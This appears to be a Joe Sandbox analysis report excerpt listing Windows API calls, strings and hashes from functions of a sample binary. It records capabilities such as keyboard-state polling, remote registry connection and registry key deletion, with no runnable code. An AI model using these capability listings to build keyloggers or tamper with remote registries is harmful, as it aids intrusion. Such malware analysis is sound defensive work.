                • Part of subcall function 007029C8: GetLastError.KERNEL32(00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000,00000000), ref: 007029F0
              • _free.LIBCMT ref: 0070DAB8
              • _free.LIBCMT ref: 0070DACD
              • _free.LIBCMT ref: 0070DAD8
              • _free.LIBCMT ref: 0070DAFA
              • _free.LIBCMT ref: 0070DB0D
              • _free.LIBCMT ref: 0070DB1B
              • _free.LIBCMT ref: 0070DB26
              • _free.LIBCMT ref: 0070DB5E
              • _free.LIBCMT ref: 0070DB65
              • _free.LIBCMT ref: 0070DB82
              • _free.LIBCMT ref: 0070DB9A
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
              • String ID:
              • API String ID: 161543041-0
              • Opcode ID: 0b50f2e46493ae6a8fa6652d446d4f72f3fbf7efdec349bbdef2f80f4d200b3d
              • Instruction ID: 6018ebed41e9d267bea4c28b79fa41bbac574d83e224d63c9a569dc357b537f2
              • Opcode Fuzzy Hash: 0b50f2e46493ae6a8fa6652d446d4f72f3fbf7efdec349bbdef2f80f4d200b3d
              • Instruction Fuzzy Hash: B0313BB2604305DFEB31AAB9E849B5677E9FF00310F254629E449E71E2DB79BC41CB20
              APIs
              • GetClassNameW.USER32(?,?,00000100), ref: 0073369C
              • _wcslen.LIBCMT ref: 007336A7
              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00733797
              • GetClassNameW.USER32(?,?,00000400), ref: 0073380C
              • GetDlgCtrlID.USER32(?), ref: 0073385D
              • GetWindowRect.USER32(?,?), ref: 00733882
              • GetParent.USER32(?), ref: 007338A0
              • ScreenToClient.USER32(00000000), ref: 007338A7
              • GetClassNameW.USER32(?,?,00000100), ref: 00733921
              • GetWindowTextW.USER32(?,?,00000400), ref: 0073395D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
              • String ID: %s%u
              • API String ID: 4010501982-679674701
              • Opcode ID: 5b86906b69c6d471b1fb5825197008676316b16e2cc47cdb9842836720eeaff3
              • Instruction ID: 77a44cab104a3df3e87f57f2509f6c521f3c2253fe6fecfc8bcadcfbe7e3cc6a
              • Opcode Fuzzy Hash: 5b86906b69c6d471b1fb5825197008676316b16e2cc47cdb9842836720eeaff3
              • Instruction Fuzzy Hash: FC91B371204706EFE725DF24C885BEAF7A9FF44314F008619FA9AC2151DB78EA45CBA1
              APIs
              • GetClassNameW.USER32(?,?,00000400), ref: 00734994
              • GetWindowTextW.USER32(?,?,00000400), ref: 007349DA
              • _wcslen.LIBCMT ref: 007349EB
              • CharUpperBuffW.USER32(?,00000000), ref: 007349F7
              • _wcsstr.LIBVCRUNTIME ref: 00734A2C
              • GetClassNameW.USER32(00000018,?,00000400), ref: 00734A64
              • GetWindowTextW.USER32(?,?,00000400), ref: 00734A9D
              • GetClassNameW.USER32(00000018,?,00000400), ref: 00734AE6
              • GetClassNameW.USER32(?,?,00000400), ref: 00734B20
              • GetWindowRect.USER32(?,?), ref: 00734B8B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
              • String ID: ThumbnailClass
              • API String ID: 1311036022-1241985126
              • Opcode ID: cc00528501475ab3f434850dab90e39b297c74276aaec789c25e82aa852bc4cc
              • Instruction ID: 3fb23d8e35cc4b88847fddd582befdc8fbffc90a06de1bce9d5188855df0817b
              • Opcode Fuzzy Hash: cc00528501475ab3f434850dab90e39b297c74276aaec789c25e82aa852bc4cc
              • Instruction Fuzzy Hash: 8691DE711042099FEB08CF14C985BBAB7E9FF84314F04846AFD869A196DB38FD45CBA5
              APIs
                • Part of subcall function 006E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006E9BB2
              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00768D5A
              • GetFocus.USER32 ref: 00768D6A
              • GetDlgCtrlID.USER32(00000000), ref: 00768D75
              • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00768E1D
              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00768ECF
              • GetMenuItemCount.USER32(?), ref: 00768EEC
              • GetMenuItemID.USER32(?,00000000), ref: 00768EFC
              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00768F2E
              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00768F70
              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00768FA1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
              • String ID: 0
              • API String ID: 1026556194-4108050209
              • Opcode ID: 8c8cbf347b941b88231d126bbd9b83732bd78a06c42b3505112ba236e9a40a27
              • Instruction ID: 10a2a4f5845e8c3d90b36a96496ba7b2a45b6c59256668b71782eab77808b2e2
              • Opcode Fuzzy Hash: 8c8cbf347b941b88231d126bbd9b83732bd78a06c42b3505112ba236e9a40a27
              • Instruction Fuzzy Hash: 8F81E071508301AFDB50CF24C884AAB7BE9FF88314F144A1DFD9697291DB79E904CB66
              APIs
              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0075CC64
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0075CC8D
              • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0075CD48
                • Part of subcall function 0075CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0075CCAA
                • Part of subcall function 0075CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0075CCBD
                • Part of subcall function 0075CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0075CCCF
                • Part of subcall function 0075CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0075CD05
                • Part of subcall function 0075CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0075CD28
              • RegDeleteKeyW.ADVAPI32(?,?), ref: 0075CCF3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
              • String ID: RegDeleteKeyExW$advapi32.dll
              • API String ID: 2734957052-4033151799
              • Opcode ID: 57230b7916e5c44c7b99b1be2f0fb1987dc9807ef0004c05555a77df9ebdcab5
              • Instruction ID: b8ba0860d2586482295cdb6391ca90cd043205d7a179a3e936eb068bd3f112d6
              • Opcode Fuzzy Hash: 57230b7916e5c44c7b99b1be2f0fb1987dc9807ef0004c05555a77df9ebdcab5
              • Instruction Fuzzy Hash: AF3170B1A01318BFDB229B90DC88EFFBB7CEF05741F004165E906E6140D6B89E49DAB4
              APIs
              • timeGetTime.WINMM ref: 0073E6B4
                • Part of subcall function 006EE551: timeGetTime.WINMM(?,?,0073E6D4), ref: 006EE555
              • Sleep.KERNEL32(0000000A), ref: 0073E6E1
              • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0073E705
              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0073E727
              • SetActiveWindow.USER32 ref: 0073E746
              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0073E754
              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0073E773
              • Sleep.KERNEL32(000000FA), ref: 0073E77E
              • IsWindow.USER32 ref: 0073E78A
              • EndDialog.USER32(00000000), ref: 0073E79B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
              • String ID: BUTTON
              • API String ID: 1194449130-3405671355
              • Opcode ID: fc667f9e1056235d70f9d9d2e829fa35b1041ac5780bf39ff9e35c545dc4f876
              • Instruction ID: 45b46c6be4eaf3b4137bb4aeeb3ae404af5ceccf8a5c06e72832753c35833b95
              • Opcode Fuzzy Hash: fc667f9e1056235d70f9d9d2e829fa35b1041ac5780bf39ff9e35c545dc4f876
              • Instruction Fuzzy Hash: 0D2184B0241305EFFB125F64EC99A353B69F796348F108425F55682AE3DBBD9C118B2C
              APIs
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0073EA5D
              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0073EA73
              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0073EA84
              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0073EA96
              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0073EAA7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: SendString$_wcslen
              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
              • API String ID: 2420728520-1007645807
              • Opcode ID: 7bf90f6dafb71b8cf3497a45f062c5af8be2aaa790c8b2f9799816e7afe02a1a
              • Instruction ID: 8c738fe0caa5d1a88ce1add17fe38ff80b08772ae4c49754e8bac7581892db83
              • Opcode Fuzzy Hash: 7bf90f6dafb71b8cf3497a45f062c5af8be2aaa790c8b2f9799816e7afe02a1a
              • Instruction Fuzzy Hash: C6117371A5026979EB20A7A2EC4AEFF6B7CEBD1F50F00452EB401A21D1EEB45D05C5B0
              APIs
                • Part of subcall function 006E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006E8BE8,?,00000000,?,?,?,?,006E8BBA,00000000,?), ref: 006E8FC5
              • DestroyWindow.USER32(?), ref: 006E8C81
              • KillTimer.USER32(00000000,?,?,?,?,006E8BBA,00000000,?), ref: 006E8D1B
              • DestroyAcceleratorTable.USER32(00000000), ref: 00726973
              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,006E8BBA,00000000,?), ref: 007269A1
              • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,006E8BBA,00000000,?), ref: 007269B8
              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,006E8BBA,00000000), ref: 007269D4
              • DeleteObject.GDI32(00000000), ref: 007269E6
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
              • String ID:
              • API String ID: 641708696-0
              • Opcode ID: 4bb26aec956ead845dbad22fb697a3635e9652425212de7769618bfd86d23a28
              • Instruction ID: c532157a4ffe608edce663264216bfb64cc7f2faa5811376aa32e0b3253d1f69
              • Opcode Fuzzy Hash: 4bb26aec956ead845dbad22fb697a3635e9652425212de7769618bfd86d23a28
              • Instruction Fuzzy Hash: E861AF30003790DFDB229F16D94872677F2FB82712F64851DE0869B660CB79B981CF98
              APIs
                • Part of subcall function 006E9944: GetWindowLongW.USER32(?,000000EB), ref: 006E9952
              • GetSysColor.USER32(0000000F), ref: 006E9862
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ColorLongWindow
              • String ID:
              • API String ID: 259745315-0
              • Opcode ID: f2cb288920d473719dd114cdb5f38dd60a17ceecf1f6f24acf7a6f9c6bf5cb41
              • Instruction ID: f2ec25cf4292dc54dc20e237437823fe99ca42be3dae8a77c56f510eeffe5df2
              • Opcode Fuzzy Hash: f2cb288920d473719dd114cdb5f38dd60a17ceecf1f6f24acf7a6f9c6bf5cb41
              • Instruction Fuzzy Hash: 8B41E2311017949FDB255F399C84BBA3B66AF06330F248A05F9A28B2F2D3749C42DB21
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0071F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00739717
              • LoadStringW.USER32(00000000,?,0071F7F8,00000001), ref: 00739720
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0071F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00739742
              • LoadStringW.USER32(00000000,?,0071F7F8,00000001), ref: 00739745
              • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00739866
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: HandleLoadModuleString$Message_wcslen
              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
              • API String ID: 747408836-2268648507
              • Opcode ID: a0b434aca8f55dad4b28e0eeab1aed15579c73b28106b53d5bff374f8aea8f2d
              • Instruction ID: b73178ec05fd28a1bbcd66298862a916ee90a2b44c65ef12ab536a63cca4b8ad
              • Opcode Fuzzy Hash: a0b434aca8f55dad4b28e0eeab1aed15579c73b28106b53d5bff374f8aea8f2d
              • Instruction Fuzzy Hash: EB416F72D00219AADF44EBE0DE86DEE7379AF55740F10012AF60172292EB796F48CB75
              APIs
                • Part of subcall function 006D6B57: _wcslen.LIBCMT ref: 006D6B6A
              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007307A2
              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007307BE
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007307DA
              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00730804
              • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0073082C
              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00730837
              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0073083C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
              • API String ID: 323675364-22481851
              • Opcode ID: ce43b72e09e6513090f05cd4315410f2b2f176549ced7d58ffa8b4fc0e309fd6
              • Instruction ID: 95c8acfcb59d74591375d26b5b1ddc976a2b038311719d0d3ca05f91431dd805
              • Opcode Fuzzy Hash: ce43b72e09e6513090f05cd4315410f2b2f176549ced7d58ffa8b4fc0e309fd6
              • Instruction Fuzzy Hash: 4E413872C10229ABDF15EBA4DC95CFDB779FF04350F04412AE901A32A1EB74AE04CBA4
              APIs
              • CoInitialize.OLE32(00000000), ref: 00747AF3
              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00747B8F
              • SHGetDesktopFolder.SHELL32(?), ref: 00747BA3
              • CoCreateInstance.OLE32(0076FD08,00000000,00000001,00796E6C,?), ref: 00747BEF
              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00747C74
              • CoTaskMemFree.OLE32(?,?), ref: 00747CCC
              • SHBrowseForFolderW.SHELL32(?), ref: 00747D57
              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00747D7A
              • CoTaskMemFree.OLE32(00000000), ref: 00747D81
              • CoTaskMemFree.OLE32(00000000), ref: 00747DD6
              • CoUninitialize.OLE32 ref: 00747DDC
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
              • String ID:
              • API String ID: 2762341140-0
              • Opcode ID: 336efb01a9b17f2d91b6f9a7c54d470ee070cbf344fc729576b345c46eac765d
              • Instruction ID: 88fa4f46b2ed3f8bcd1c0b43ce7eeebb851591999076f28b77f8412965df9cd9
              • Opcode Fuzzy Hash: 336efb01a9b17f2d91b6f9a7c54d470ee070cbf344fc729576b345c46eac765d
              • Instruction Fuzzy Hash: 0DC12B75A04209AFCB14DFA4C884DAEBBF9FF48314B148499E81A9B361DB34ED45CF94
              APIs
              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00765504
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00765515
              • CharNextW.USER32(00000158), ref: 00765544
              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00765585
              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0076559B
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007655AC
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$CharNext
              • String ID:
              • API String ID: 1350042424-0
              • Opcode ID: a9f19b519fba1ca7e1668433fffe26b91a0a4dee532c32914e6578a40c3d989e
              • Instruction ID: a9d3765b25db9d9cb9c25acf3f0b136b4d4e2724887bcd4f0457ca8e471b50d3
              • Opcode Fuzzy Hash: a9f19b519fba1ca7e1668433fffe26b91a0a4dee532c32914e6578a40c3d989e
              • Instruction Fuzzy Hash: FB618E30900609EFDF118F64CC84DFE7BB9EB05724F108185F967A6291DB7C9A80EB60
              APIs
              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0072FAAF
              • SafeArrayAllocData.OLEAUT32(?), ref: 0072FB08
              • VariantInit.OLEAUT32(?), ref: 0072FB1A
              • SafeArrayAccessData.OLEAUT32(?,?), ref: 0072FB3A
              • VariantCopy.OLEAUT32(?,?), ref: 0072FB8D
              • SafeArrayUnaccessData.OLEAUT32(?), ref: 0072FBA1
              • VariantClear.OLEAUT32(?), ref: 0072FBB6
              • SafeArrayDestroyData.OLEAUT32(?), ref: 0072FBC3
              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0072FBCC
              • VariantClear.OLEAUT32(?), ref: 0072FBDE
              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0072FBE9
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
              • String ID:
              • API String ID: 2706829360-0
              • Opcode ID: 087bfa131f44d690eacc3a97a6ded732074b4658513fc3f214a4300d00ee15d7
              • Instruction ID: 510550fcb4b1984d36b7978bfcc8d2588bb2ad7a7bbf485244397592e94b6b2f
              • Opcode Fuzzy Hash: 087bfa131f44d690eacc3a97a6ded732074b4658513fc3f214a4300d00ee15d7
              • Instruction Fuzzy Hash: 26418E75A00269DFCB01DF64D8589AEBFB9EF08354F00C039E946A7261CB78A945CFA4
              APIs
              • GetKeyboardState.USER32(?), ref: 00739CA1
              • GetAsyncKeyState.USER32(000000A0), ref: 00739D22
              • GetKeyState.USER32(000000A0), ref: 00739D3D
              • GetAsyncKeyState.USER32(000000A1), ref: 00739D57
              • GetKeyState.USER32(000000A1), ref: 00739D6C
              • GetAsyncKeyState.USER32(00000011), ref: 00739D84
              • GetKeyState.USER32(00000011), ref: 00739D96
              • GetAsyncKeyState.USER32(00000012), ref: 00739DAE
              • GetKeyState.USER32(00000012), ref: 00739DC0
              • GetAsyncKeyState.USER32(0000005B), ref: 00739DD8
              • GetKeyState.USER32(0000005B), ref: 00739DEA
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: State$Async$Keyboard
              • String ID:
              • API String ID: 541375521-0
